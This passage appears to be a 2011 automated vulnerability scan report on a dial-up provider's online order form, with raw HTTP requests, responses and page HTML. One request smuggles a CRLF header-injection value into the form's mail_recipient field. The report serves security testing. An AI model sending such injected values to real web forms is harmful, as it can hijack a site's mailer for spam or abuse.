PRIVACY POLICY: Dialup 4 Less.com will not give out your email address and/or personal information to any 3rd party entity, with the exception that if Dialup 4 Less.com is acquired, it may have to provide this information to the purchaser of the business so they can continue providing service to you. 12. DISCLAIMER OF WARRANTIES and LIMITATION OF LIABILITY. EXCEPT FOR CERTAIN PRODUCTS AND SERVICES SPECIFICALLY IDENTIFIED AS BEING OFFERED BY DialUp 4 Less.com. Dialup 4 Less.com does not control any materials, information, products, or services on the internet. The internet contains unedited materials, some of which are sexually explicit or may be offensive to you. Dialup 4 Less.com has no control over and accepts no responsibility for such materials. You assume full responsibility and risk for use of the services and the internet and are solely responsible for evaluating the accuracy, completeness, and usefulness of all services, products, and other information, and the quality and merchantability of all merchandise provided through the service or the internet. The services are provided on an "as is" and "as available" basis. Dialup 4 Less.com does not warrant that the services will be uninterrupted, error-free, or free of viruses or other harmful components. Dialup 4 Less.com makes no express warranties and waives all implied warranties including, but not limited to, warranties of title, noninfringement, merchantability, and fitness for a particular purpose regarding any merchandise, information or service provided through Dialup 4 Less.com or the internet generally. No advice or information given by Dialup 4 Less.com or its representatives shall create a warranty. Dialup 4 Less.com and its employees are not liable for any costs or damages arising directly or indirectly from your use of the services or the internet including any indirect, incidental, exemplary, multiple, special, punitive, or consequential damages. In any event, DialUp 4 Less's cumulative liability to any member for any and all claims relating to the use of the services shall not exceed the total amount of service fees paid during a one month period. 13. Indemnification: Customer agrees that it shall defend, indemnify, save and hold Dialup 4 Less harmless from any and all demands, liabilities, losses, costs and claims, including reasonable attorney's fees asserted against Dialup 4 Less.com, its agents, its customers, officers and employees, that may arise or result from any service provided or performed or agreed to be performed or any product sold by customer, its agents, employees or assigns. Customer agrees to defend, indemnify and hold harmless Dialup 4 Less.com against liabilities arising out of: (1) Any injury to person or property caused by any products sold or otherwise distributed in connection with Dialup 4 Less's server; (2) Any material supplied by customer infringing or allegedly infringing on the proprietary rights of a third party; (3) Copyright infringement and (4) Any defective products sold to customer from Dialup 4 Less 's server. 14. MISCELLANEOUS: This Agreement, and Dialup 4 Less's other user policies posted on Dialup 4 Less's Web site constitute the entire agreement between you and Dialup 4 Less.com with respect to your use of the Services. Dialup 4 Less.com may revise, amend, or modify this Agreement, and any other user policies and agreements, at any time and in any manner without prior notice.
INITIALS POST 3
orderbutton POST SUBMIT

Request

POST /dialup4less.com/cgi-bin/order.cgi HTTP/1.1
Referer: https://secure.hosting4less.com/dialup4less.com/order.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.hosting4less.com
Content-Length: 12893
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cour_listfields=value&cour_top=Thank+you+for+signing+up+with+Dialup+4+Less.com++The+following+is+%0d%0athe+information+that+was+filled+out+on+our+online+order+form.++You+wil+be+receiving+a+phone+call+to+verify+this+order+from+our+company.%0d%0aPlease+also+reply+back+to+this+email+confirming+that+the+information+is+correct.%0d%0a%0d%0aConfirmation+Info%3a&html_redirect=http%3a%2f%2fwww.dialup4less.com%2fthankyou.html&cour_send=value&print_blank_fields=value&required=DESIREDUSERNAME%2cDESIREDPASSWORD%2cTERM%2cCARD-HOLDER-NAME%2cNAME%2cADDRESS%2cCITY%2cSTATE%2cZIP%2cPHONE%2cemail%2cINITIALS&cour_bottom=Thank+You+for+choosing+Dialup+4+Less.com.+We+look+forward+to+providing+you+with+the+best+service+possible.++You+will+be+receiving+your+login+%0d%0ainformation+in+another+email+shortly.++Be+advised%2c+all+accounts+automatically+renew+until+canceled+by+faxing+or+emailing+us+a+cancelation+notice+prior+to+renewal+date.&cour_close=Sincerely%2c&cour_myname=Dialup+4+Less.com&cour_myemail=order%40dialup4less.com&cour_mywebsite=http%3a%2f%2fwww.dialup4less.com&mail_subject=Dialup+4+Less.com+Account+Sign+Up&mail_recipient=%0D%0Ans:netsparker056650=vuln&mail_listfields=value&env_report=REMOTE_HOST%2cREMOTE_ADDR%2cHTTP_USER_AGENT&DESIREDUSERNAME=Ronald+Smith&DESIREDPASSWORD=3&TERM=PLAN%3a+Vacation+Dial-Up+-+Only+1+Month+(%2419.95+(%249.95%2fmo)+%26+%2410+SETUP+FEE)&NAME=Ronald+Smith&ORGANIZATION=3&ADDRESS=3&CITY=3&STATE=Select+a+State%2fprovince&ZIP=3&COUNTRY=3&PHONE=3&MOBILE-NUMBER=3&FAX=3&email=netsparker%40example.com&REPRESENTATIVE=3&PROMOTION-CODE=3&REFERER=3&CARD-HOLDER-NAME=Ronald+Smith&CREDIT-CARD-NUMBER=3&Credit Card Type=SelectPlan&CREDIT-CARD-EXPIRATION=selectyear&CreditCard Billing Address=3&billingcity=3&billingstate=3&CreditCard Billing ZipCode=3&AGREEMENT=1.+INTRODUCTION%3a%0d%0aDialup+4+Less.com+provides+its+Nationwide+Internet+Access%2c+as+they+may+exist+from+time+to+time+(%22Services%22)%2c+to+users+%0d%0awho+pay+a+quarterly%2c+semi+annual+or+annual+service+fee+to+subscribe+to+the+Services+(%22Members%22).+By+establishing+an+account%2c+you+agree+to+be+bound+by+this+Agreement+and+to+use+%0d%0athe+Services+in+compliance+with+this+Agreement%2c+our+Acceptable+Use+Policy+and+other+policies.%0d%0a%0d%0aIf+you+do+not+agree+to+the+terms+and+conditions+of+this+Agreement%2c+including+any+future+revisions%2c+we+suggest+you+not+use+our+Services.+If+you+are+a+%0d%0acurrent+Member%2c+please+terminate+your+use+of+the+Services+under+Section+6.%0d%0a%0d%0a2.+SUBSCRIPTION+REQUIREMENTS%3a%0d%0aMembers+must+be+at+least+18+years+old.+Local+access+dial-up+numbers+may+not+be+available+in+all+areas.+You+are+solely+responsible+for+determining+if+use+%0d%0aof+a+particular+dial-up+number+will+cause+you+to+incur+long-distance%2c+toll+or+other+charges.+Dialup+4+Less.com+is+not+responsible+for+any+long-distance%2c+%0d%0atoll+or+other+telecommunications+charges+you+incur.+Current+prices+for+Dialup+4+Less.com+Services+are+posted+throughout+our+website+at+%0d%0ahttp%3a%2f%2fwww.dialup4less.com+These+rates+may+also+be+obtained+by+calling+(888)+818-0444+8am+to+6pm+weekdays%2c+Pacific+Standard+Time.+Dialup+4+Less.com+%0d%0areserves+the+right+to+change+prices%2c+policies+and+institute+new+fees+and+or+policies+at+any+time.%0d%0a%0d%0a3.+PAYMENT+OBLIGATIONS+OF+A+MEMBER.%0d%0aA.+Members+must+provide+Dialup+4+Less.com+with+accurate+and+complete+billing+information+including+legal+name%2c+address%2c+telephone+number%2c+and+credit+%0d%0acard%2fbilling+information.+%0d%0a%0d%0aB.+Report+to+Dialup+4+Less.com+all+changes+to+this+information+within+five+(5)+days+of+the+change.+Members+are+responsible+for+any+changes+to+their+%0d%0aaccount.%0d%0a%0d%0aC.+Members+having+questions+regarding+charges+to+an+account%2c+should+contact+Dialup+4+Less's+Billing+Department+at+(888)+818-0444+8am+to+6pm+weekdays+%0d%0aPacific+Standard+Time.%0d%0a%0d%0a4.+CREDIT+CARD+ACCOUNTS%3a+%0d%0aAll+charges+are+automatically+billed+to+the+member's+credit+card+on+the+day+of+sign+up+and+the+first+day+of+each+billing+anniversary+month+from+that+%0d%0apoint+on+until+the+account+is+cancelled.+Once+an+account+is+set+up%2c+all+recurring+billing+will+be+on+the+first+of+the+month.+regardless+of+the+day+they+sign+up.+You+will+be+billed+%0d%0aquarterly+%2c+semi+annual+or+annual+depending+on+the+selection+you+chose+when+you+signed+up.+In+the+event+the+credit+card+is+declined+by+your+Bank%2c+the+customer+will+be+notified+by+email+or+%0d%0aphone+to+the+email%2fphone+number+on+file.+Past+due+accounts+that+are+not+brought+current+within+5+days+of+the+notice+are+subject+to+suspension+and+possible+account+termination.+There+will+be+a+%0d%0a%2420+Re-Activation+Fee+on+any+accounts+suspended+and+then+later+re-activated.+All+payments+are+non-refundable%2c+there+are+no+refunds+expressed+or+%0d%0aimplied+with+this+service.++The+company+listed+on+the+credit+card+statement+will+be+Hosting+4+Less.+Dialup+4+Less.com+will+not+be+responsible+for+any+%0d%0acharges+or+expenses+(e.g+for+overdrawn+accounts%2c+exceeding+credit+card+limits%2c+etc.)+resulting+from+charges+billed+by+Dialup+4+Less.com.%0d%0a%0d%0a5.+TERM+OF+AGREEMENT%3a+%0d%0aContinued+use+of+the+Services+constitutes+acceptance+of+this+Agreement+and+any+future+versions.+If+you+are+dissatisfied+with+the+Services+or+any+related+%0d%0aterms%2c+conditions%2c+rules%2c+policies%2c+guidelines%2c+or+practices%2c+your+sole+and+exclusive+remedy+is+to+discontinue+using+the+Services+by+terminating+your+%0d%0aaccount.%0d%0a%0d%0a6.+CANCELLATION%3a+%0d%0aYou+may+terminate+your+account+at+any+time+and+for+any+reason+by+providing+notice+of+intent+to+terminate+to+Dialup+4+Less.com+by%3a+%0d%0a%0d%0aA.++Fax%3a++Send+a+Fax+In+Writing+To+Dialup+4+Less.com+at+(818)+773-8023+With+Your+UserName+%26amp%3b+Password.%0d%0a%0d%0aB.+Email%3a+billing%40dialup4less.com.%0d%0a%0d%0aC.+To+protect+you+and+for+security+purposes%2c+all+requests+for+cancellations+or+changes+will+require+your+user+name+and+password.+Dialup+4+Less.com+may+%0d%0aterminate+this+Agreement%2c+your+password%2c+your+account%2c+or+your+use+of+the+Services%2c+for+any+reason%2c+including%2c+without+limitation%2c+if+Dialup+4+Less.com%2c+%0d%0ain+its+sole+discretion%2c+believes+you+have+violated+this+Agreement%2c+our+Acceptable+Use+Policy%2c+or+any+of+the+applicable+user+policies.+Dialup+4+Less.com+%0d%0awill+provide+a+termination+notice+to+you+by%3a+email+addressed+to+your+email+account.+All+notices+to+you+shall+be+deemed+effective+immediately.+Sections+%0d%0a3%2c+9%2c+10%2c+and+12+of+this+Agreement+shall+survive+termination+of+this+Agreement.%0d%0a%0d%0a7.+ACCOUNT%2c+PASSWORD%2c+AND+SECURITY%3a%0d%0aYou+must+keep+your+password+confidential+so+that+no+one+else+may+access+the+Services+through+your+account.+Sharing+your+account+is+prohibited%2c+your+%0d%0aaccount+is+for+your+exclusive+use+only.+You+must+notify+Dialup+4+Less.com+immediately+upon+discovering+any+unauthorized+use+of+your+account.%0d%0a%0d%0a%0d%0a8.+EXTENT+OF+USE%3a+%0d%0aAn+%22Unlimited%22+access+account+does+not+constitute+a+dedicated+connection.+Dialup+4+Less.com+intends+it+to+be+for+an%0d%0aunlimited+amount+of+time+%22manually%22+making+use+of+the+connection+(ie%3a+a+individual+human+being+sitting+at+a+computer).++This+service+is+intended%0d%0afor+reasonable+usage.++Dialup+4+Less.com+employs+a+10+minute+inactivity+%0d%0atimer+as+well+as+a+5+hour+network+cutoff+timer+to+ensure+fair%0d%0aaccess+to+all+customers.+Anyone+attempting+to+remain+on+line+continuously+by+automatically+redialing+after+being+disconnected+may+be+cancelled+in+order+%0d%0ato+protect+our+network+resources+and+maintain+Service+availability+for+%0d%0aothers.%0d%0a%0d%0a9.+EMAIL+USE+AND+SPAM%3a%0d%0aEmail+accounts+are+limited+to+50MB+in+terms+of+storage.++It+is+suggested+that+Emails+be+downloaded+each+time+mail+is+%0d%0afetched+and+stored+on+the+server+for+no+longer+than+60+days.+Dialup+4+Less.com+is+not+responsible+for+any+email+that+is+lost.%0d%0a%0d%0aUsing+a+Dialup+4+Less.com+account+for+the+purposes+of+sending+SPAM+is+prohibited.+Tampering+with+%0d%0athe+return+address+or+route+report+on+an+email+message+or+Usenet+newsgroup+is+prohibited.+Anonymous+transmission+of+any+sort+is+prohibited.%0d%0a%0d%0aSPAM+is+defined+as+any+unwanted+and+unsolicited+transmission+of+data+through+email+and+usenet+newsgroups.+It+includes+but+is+not+limited+to%3a+%0d%0aadvertisements+for+goods+or+services%2c+chain+letters+and+multi-level+marketing%2c+off+topic+postings+to+mailing+lists+or+newsgroups%2c+any+message+sent+to+%0d%0amore+than+5+newsgroups+or+3+list+owners.+%0d%0a%0d%0aAny+violations+will+be+considered+a+breach+of+this+agreement+and+will+result+in+the+immediate+cancellation+of+all+services+without+warning.%0d%0a%0d%0a10.+AVAILABILITY+OF+THE+SERVICES%3a+%0d%0aDialup+4+Less.com+may+change+its+POP+numbers+at+any+time.+Dialup+4+Less.com+reserves+the+right+to+direct+Members+to+use+certain+numbers+to+access+the+%0d%0aService+or+to+restrict+use+of+specific+access+numbers.+User+names%2c+passwords+and+email+addresses+are+Dialup+4+Less's+property+and+Dialup+4+Less.com+may+%0d%0aalter+or+replace+them+at+any+time.%0d%0a%0d%0a%0d%0a11.+PRIVACY+POLICY%3a+%0d%0aDialup+4+Less.com+will+not+give+out+your+email+address+and%2for+personal+information+to+any+3rd+party+entity%2c+with+the+exception+that+if+Dialup+4+Less.com+%0d%0ais+acquired%2c+it+may+have+to+provide+this+information+to+the+purchaser+of+the+business+so+they+can+continue+providing+service+to+you.%0d%0a%0d%0a%0d%0a12.+DISCLAIMER+OF+WARRANTIES+and+LIMITATION+OF+LIABILITY.+EXCEPT+FOR+CERTAIN+PRODUCTS+AND+SERVICES+SPECIFICALLY+IDENTIFIED+AS+BEING+OFFERED+BY+DialUp+4+%0d%0aLess.com.+%0d%0aDialup+4+Less.com+does+not+control+any+materials%2c+information%2c+products%2c+or+services+on+the+internet.+The+internet+contains+unedited+materials%2c+some+of+%0d%0awhich+are+sexually+explicit+or+may+be+offensive+to+you.+Dialup+4+Less.com+has+no+control+over+and+accepts+no+responsibility+for+such+materials.+You+%0d%0aassume+full+responsibility+and+risk+for+use+of+the+services+and+the+internet+and+are+solely+responsible+for+evaluating+the+accuracy%2c+completeness%2c+and+%0d%0ausefulness+of+all+services%2c+products%2c+and+other+information%2c+and+the+quality+and+merchantability+of+all+merchandise+provided+through+the+service+or+the+%0d%0ainternet.%0d%0a%0d%0aThe+services+are+provided+on+an+%22as+is%22+and+%22as+available%22+basis.+Dialup+4+Less.com+does+not+warrant+that+the+services+will+be+uninterrupted%2c+%0d%0aerror-free%2c+or+free+of+viruses+or+other+harmful+components.+Dialup+4+Less.com+makes+no+express+warranties+and+waives+all+implied+warranties+including%2c+%0d%0abut+not+limited+to%2c+warranties+of+title%2c+noninfringement%2c+merchantability%2c+and+fitness+for+a+particular+purpose+regarding+any+merchandise%2c+information+%0d%0aor+service+provided+through+Dialup+4+Less.com+or+the+internet+generally.+No+advice+or+information+given+by+Dialup+4+Less.com+or+its+representatives+%0d%0ashall+create+a+warranty.+Dialup+4+Less.com+and+its+employees+are+not+liable+for+any+costs+or+damages+arising+directly+or+indirectly+from+your+use+of+the+%0d%0aservices+or+the+internet+including+any+indirect%2c+incidental%2c+exemplary%2c+multiple%2c+special%2c+punitive%2c+or+consequential+damages.+In+any+event%2c+DialUp+4+%0d%0aLess's+cumulative+liability+to+any+member+for+any+and+all+claims+relating+to+the+use+of+the+services+shall+not+exceed+the+total+amount+of+service+fees+%0d%0apaid+during+a+one+month+period.%0d%0a%0d%0a13.+Indemnification%3a%0d%0aCustomer+agrees+that+it+shall+defend%2c+indemnify%2c+save+and+hold+Dialup+4+Less+harmless+from+any+and+all+demands%2c+liabilities%2c+losses%2c+costs+and+claims%2c+%0d%0aincluding+reasonable+attorney's+fees+asserted+against+Dialup+4+Less.com%2c+its+agents%2c+its+customers%2c+officers+and+employees%2c+that+may+arise+or+result+%0d%0afrom+any+service+provided+or+performed+or+agreed+to+be+performed+or+any+product+sold+by+customer%2c+its+agents%2c+employees+or+assigns.+Customer+agrees+to+%0d%0adefend%2c+indemnify+and+hold+harmless+Dialup+4+Less.com+against+liabilities+arising+out+of%3a+(1)+Any+injury+to+person+or+property+caused+by+any+products+%0d%0asold+or+otherwise+distributed+in+connection+with+Dialup+4+Less's+server%3b+(2)+Any+material+supplied+by+customer+infringing+or+allegedly+infringing+on+the+%0d%0aproprietary+rights+of+a+third+party%3b+(3)+Copyright+infringement+and+(4)+Any+defective+products+sold+to+customer+from+Dialup+4+Less+'s+server.%0d%0a%0d%0a14.+MISCELLANEOUS%3a+%0d%0aThis+Agreement%2c+and+Dialup+4+Less's+other+user+policies+posted+on+Dialup+4+Less's+Web+site+constitute+the+entire+agreement+between+you+and+Dialup+4+Less.com+with+respect+to+your+use+of+the+Services.%0d%0a%0d%0aDialup+4+Less.com+may+revise%2c+amend%2c+or+modify+this+Agreement%2c+and+any+other+user+policies+and+agreements%2c+at+any+time+and+in+any+manner+without+prior+notice.&INITIALS=3&orderbutton=SUBMIT

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 18 Feb 2011 03:36:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, root@localhost and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache Server at secure.hosting4less.com Port 443</address></body></html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /

/ CONFIRMED

https://secure.hosting4less.com/

Request

GET / HTTP/1.1
Referer: https://secure.hosting4less.com/dialup4less.com/order.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.hosting4less.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Fri, 18 Feb 2011 03:34:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 227
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p><hr><address>Apache Server at secure.hosting4less.com Port 443</address></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /dialup4less.com/order.html

/dialup4less.com/order.html

https://secure.hosting4less.com/dialup4less.com/order.html

Found E-mails

  • order@dialup4less.com
  • billing@dialup4less.com

Request

GET /dialup4less.com/order.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.hosting4less.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 18 Feb 2011 03:34:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 11444
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Dialup 4 Less - Internet Account Sign Up Form</title> <!-- set the ssi value for the body_set image in the nav, use it to define name value of the image --> <!-- end body-set conditional statement --><!-- value for small nav menu on/off setting --><!-- if it's on, set the menu that you need turned on --> <link rel="stylesheet" href="b4l3.css" type="text/css" /> <script type="text/javascript" src="/scripts/overlib/overlib.js"></script></head><body><div id="overDiv" style="position:absolute; visibility:hidden; z-index:1000;"></div><div id="frame"> <div id="contentleft"><img src="gfx/l1.jpg" alt="Dialup 4 Less" /></div> <div id="contentcenter"> <div id="contentheader"><img src="gfx/1.jpg" alt="Dialup 4 Less" /></div> <div id="contentmenu"> <!--|**START IMENUS**|imenus0,js--><script language="JavaScript" src="scripts/imenus0.js" type="text/javascript"></script><!--|**END IMENUS**|--><!--[imcode]*** Infinite Menus Settings / Code - This script reference must appear last. *** *Note: This script is required for scripted add on support and IE 6 sub menu functionality. *Note: This menu will fully function in all CSS2 browsers with the script removed.--><script language="JavaScript" src="scripts/ocscript.js" type="text/javascript"></script><noscript> <div id='jswarning'><div align="center"><div style="font:bold 9pt tahoma; color: #000000;">JavaScript is disabled and the Main Site Menu and other functions will not work!</div> <table border="0" cellspacing="0" cellpadding="0" bgcolor="#ececec"> <tr> <td align="center" width="852"> <a href="http://www.dialup4less.com/">Home</a>&nbsp;| <a href="http://www.dialup4less.com/aboutus.html">About Us</a>&nbsp;| <a href="http://www.dialup4less.com/access.html">Access&nbsp;Numbers</a>&nbsp;| <a href="http://www.dialup4less.com/plans.html">Dial-Up&nbsp;Plans</a>&nbsp;| <a href="http://www.dialup4less.com/faqs.html">Dial-Up&nbsp;FAQs</a>&nbsp;| <a href="http://www.dialup4less.com/support.html">Dial-Up&nbsp;Support</a>&nbsp;| <a href="https://secure.hosting4less.com/dialup4less.com/order.html">SignUp</a>&nbsp;| <a href="http://www.dialup4less.com/contactus.html">Contact</a>&nbsp;| <a href="http://www.hosting4less.com" target="_new">Web&nbsp;Hosting</a>&nbsp;| <a href="http://www.backup4less.com/" target="_new">Online&nbsp;Backup</a>&nbsp; </td> </tr> </table> </div></div></noscript> </div> <!-- |||||||||||||||||||||||||||||||||||||||||||||| --> <!-- |||||||||||||||||||||||||||||||||||||||||||||| --> <!-- |||||||||||||||||||||||||||||||||||||||||||||| --> <!-- start main body --> <div class="IbodyR4C"> <!-- |||||||||||||||||||||||||||||||||||||||||||||| --> <!-- |||||||||||||||||||||||||||||||||||||||||||||| --> <!-- |||||||||||||||||||||||||||||||||||||||||||||| --> <div class="IbodySmallBlockImg"> <img src="gfx/ndialupplans.jpg" alt="Dial-Up Plans" width="275" /> </div> <div class="input_small"> <div class="navcel"><a href="http://www.dialup4less.com/plans.html">Dial-Up Plans</a></div> <div class="navcel"><a href="http://www.dialup4less.com/hispeeddialup.html">High-Speed Dial-Up Access</a></div> <div class="navcel"><a href="http://www.dialup4less.com/unlimitedaccess.html">Unlimited Dial-Up Access</a></div> <div class="navcel"><a href="http://www.dialup4less.com/limitedaccess.html">Limited Dial-Up Access</a></div> <div class="navcel"><a href="http://www.dialup4less.com/corporateaccounts.html">Corporate Dial-Up Accounts</a></div> <div class="navcel"><a href="http://www.dialup4less.com/wholesaleaccounts.html">Wholesale Dial-Up Accounts</a></div> </div> <form action="http://www.dialup4less.com/cgi-bin/localnumber.cgi" method="post"> <div class="IbodySmallBlockImg"> <img src="gfx/dsearch6.jpg" vspace="2" alt="Dial-Up Access Numbers" /> </div> <div class="input_small"> <div class="navcel4"> <input style="color:#3d3d3d; width:40px; *width:50px; padding:2px; border:1px solid; border-color:#767ede; font-size:13px; background-color:#e3efff;" name="npa" maxlength="5" value="(555)" onFocus="if(this.value=='(555)')this.value='';"> <input style="color:#3d3d3d; width:40px; *width:50px; padding:2px; border:1px solid; border-color:#767ede; font-size:13px; background-color:#e3efff;" name="nxx" maxlength="3" value="555" onFocus="if(this.value=='555')this.value='';"> <input style="color:#ffffff; border:1px solid; border-color:#767ede; font-size:14px; background-color:#151a61;" type="submit" style="formboxorder" name="search" value="Search" /></div> </div> <div class="IbodySmallBlockImg"> <a href="https://secure.hosting4less.com/dialup4less.com/order.html"><img src="gfx/navsignup.jpg" alt="Sign Up" width="275" border="0" /></a><br /> <a href="http://www.dialup4less.com/webmail" target="_new"><img src="gfx/navemail.jpg" alt="check your email here" vspace="5" width="275" border="0" /></a><br /> <img src="gfx/phoneNav.jpg" alt="Contact Us" width="275" /><br /><!-- GeoTrust QuickSSL [tm] Smart Icon tag. Do not edit. --><SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="//smarticon.geotrust.com/si.js"></SCRIPT><br /><!-- end GeoTrust Smart Icon tag --> <br /><a href="https://www.bbb.org/online/consumer/cks.aspx?ID=1070604163638" target="_new"><img src="gfx/bbb4.jpg" alt="bbb" border="0" /></a><br /> </div></form> <!-- end main body --> </div> <!-- end main body --> <!-- start right layout set --> <div id="IbodyLC"><!-- 280 --> <!-- start logos --><!-- 600 --> <div class="IbodyLogoSet"> <div class="header_body"> <h1>Dial-Up Signup Form</h1> <br />ALL ACCOUNTS WILL BE VOICE VERIFIED PRIOR TO ACTIVATION <br /> </div> <div align="center"> <form action="cgi-bin/order.cgi" method="post"> <input type="hidden" name="cour_listfields" value="value"><input type="hidden" name="cour_top" value="Thank you for signing up with Dialup 4 Less.com The following is the information that was filled out on our online order form. You wil be receiving a phone call to verify this order from our company.Please also reply back to this email confirming that the information is correct.Confirmation Info:"><input type="hidden" name="html_redirect" value="http://www.dialup4less.com/thankyou.html"><input type="hidden" name="cour_send" value="value"><input type="hidden" name="print_blank_fields" value="value"><input type="hidden" name="required" value="DESIREDUSERNAME,DESIREDPASSWORD,TERM,CARD-HOLDER-NAME,NAME,ADDRESS,CITY,STATE,ZIP,PHONE,email,INITIALS"><input type="hidden" name="cour_bottom" value="Thank You for choosing Dialup 4 Less.com. We look forward to providing you with the best service possible. You will be receiving your login information in another email shortly. Be advised, all accounts automatically renew until canceled by faxing or emailing us a cancelation notice prior to renewal date."><input type="hidden" name="cour_close" value="Sincerely,"><input type="hidden" name="cour_myname" value="Dialup 4 Less.com"><input type="hidden" name="cour_myemail" value="order@dialup4less.com"><input type="hidden" name="cour_mywebsite" value="http://www.dialup4less.com"><input type="hidden" name="mail_subject" value="Dialup 4 Less.com Account Sign Up"><input type="hidden" name="mail_recipient" value="order@dialup4less.com"><input type="hidden" name="mail_listfields" value="value"><input type="hidden" name="env_report" value="REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT"> <div class="header_body_order"> <strong>Account Setup Information</strong> </div> <table border="0" width="575" cellpadding="0" cellspacing="0"> <tr> <td class="compareOrder" width="175" align="right">Desired&nbsp;Username</td><td class="compare_head_Order"><input class="formboxOrder" name="DESIREDUSERNAME" type="text" size="35" /></td> </tr> <tr> <td class="compareOrder2" width="175" align="right">Desired&nbsp;Password</td><td class="compare_head_Order2"><input class="formboxOrder" name="DESIREDPASSWORD" type="text" size="35" /></td> </tr> </table> <table><tr><td><p>&nbsp;</p></td></tr></table> <div class="header_body_order"> <h1>Select 5X High-Speed Dial-Up Access</h1>Setup Up Payment Schedule- No Setup Fees! </div> <table border="0" width="575" cellpadding="0" cellspacing="0"> <tr> <td class="compareOrder">&nbsp;&nbsp;Term&nbsp;&nbsp;</td> <td class="compare_head_Order4"><strong>3&nbsp;Months</strong></td> <td class="compare_head_Order4"><strong>6&nbsp;Months</strong></td> <td class="compare_head_Order4"><strong>12&nbsp;Months</strong></td> </tr> <tr> <td class="compareOrder4">Monthly&nbsp;Cost</td> <td class="compare_head_Order5"><strong>$12.95 p/month</strong></td> <td class="compare_head_Order5"><strong>$12.95 p/month</strong></td> <td class="compare_head_Order5"><strong>$12.95 p/month</strong></td> </tr> <tr> <td class="compareOrder4">Term Total</td> <td class="compare_head_Order5">$38.85</td> <td class="compare_head_Order5">$77.70</td> <td class="compare_head_Order5">$155.40</td> </tr> <tr> <td class="compareOrder2">Select Plan</td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: 5X-HiSpeed Dial-Up - Every 3 Months ($38.85 ($12.95/mo) & NO SETUP FEE)" /></td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: 5X-HiSpeed Dial-Up - Every 6 Months ($77.70 ($12.95/mo) & NO SETUP FEE)" /></td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: 5X-HiSpeed Dial-Up - Every 12 Months ($155.40 ($12.95/mo) & NO SETUP FEE)" /></td> </tr> </table> <table><tr><td><p>&nbsp;</p></td></tr></table> <div class="header_body_order"> <h1>Select Unlimited Dial-Up Access</h1>Setup Up Payment Schedule- No Setup Fees! </div> <table border="0" width="575" cellpadding="0" cellspacing="0"> <tr> <td class="compareOrder">&nbsp;&nbsp;Term&nbsp;&nbsp;</td> <td class="compare_head_Order4"><strong>3&nbsp;Months</strong></td> <td class="compare_head_Order4"><strong>6&nbsp;Months</strong></td> <td class="compare_head_Order4"><strong>12&nbsp;Months</strong></td> </tr> <tr> <td class="compareOrder4">Monthly&nbsp;Cost</td> <td class="compare_head_Order5"><strong>$9.95 p/month</strong></td> <td class="compare_head_Order5"><strong>$9.95 p/month</strong></td> <td class="compare_head_Order5"><strong>$9.95 p/month</strong></td> </tr> <tr> <td class="compareOrder4">Term Total</td> <td class="compare_head_Order5">$29.85</td> <td class="compare_head_Order5">$59.70</td> <td class="compare_head_Order5">$119.40</td> </tr> <tr> <td class="compareOrder2">Select Plan</td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: Unlimited Dial-Up - Every 3 Months ($29.85 ($9.95/mo) & NO SETUP FEE)" /></td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: Unlimited Dial-Up - Every 6 Months ($59.70 ($9.95/mo) & NO SETUP FEE)" /></td> <td class="compare_head_Order2"> <input type="radio" name="TERM" value="PLAN: Unlimited Dial-Up - Every 12 Months ($119.40 ($9.95/mo) & NO SETUP FEE)" /></td> </tr> </table> <table><tr><td><p>&nbsp;</p></td></tr></table> <div class="header_body_order"> <h1>Select Limited Dial-Up Access</h1>Setup Up Payment Schedule </div> <table border="0" width="575" cellpadding="0" cellspacing="0"> <tr> <td class="compareOrder">&nbsp;&nbsp;Term&nbsp;&nbsp;</td> <td class="compare_head_Order4"><strong>3&nbsp;Months</strong></td> <td class="compare_head_Order4"><strong>6&nbsp;Months</strong></td> <td 